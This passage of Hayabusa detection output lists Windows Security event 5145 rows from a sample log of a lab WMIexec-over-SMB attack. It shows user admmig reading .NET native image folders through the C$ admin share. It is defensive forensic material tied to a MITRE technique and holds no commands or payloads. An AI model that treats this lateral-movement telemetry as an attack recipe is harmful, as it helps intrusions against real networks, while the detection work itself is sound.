SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig 
| Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Temp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
